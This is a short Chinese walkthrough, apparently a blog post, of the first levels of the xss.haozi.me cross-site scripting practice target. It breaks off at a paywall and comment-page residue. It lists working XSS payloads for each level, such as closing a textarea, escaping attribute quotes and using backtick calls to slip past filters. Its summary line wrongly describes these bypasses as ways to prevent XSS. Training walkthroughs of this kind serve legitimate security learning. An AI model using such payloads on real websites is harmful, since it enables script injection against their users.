靶机地址:https://xss.haozi.me
0x00
无防
<script>alert(1)</script>

0x01
在<textarea>标签这个标签内,所有的脚本语言都是字符串,不能被调用执行,闭合标签即可;
</textarea><script>alert(1)</script>

0x02
闭合" 和< 即可
"><script>alert(1)</script>
aaa" onclick="alert(1)

0x03
正则表达式,将 () 替换为空,用 `` 代替即
<script>alert`1`</script>

0x04
正则表

本文介绍了10种策略来防止XSS攻击,包括利用HTML标签特性、正则表达式、编码转义和巧妙的字符组合,以确保代码安全执行。
最低0.47元/天 解锁文章
1232

被折叠的 条评论
为什么被折叠?



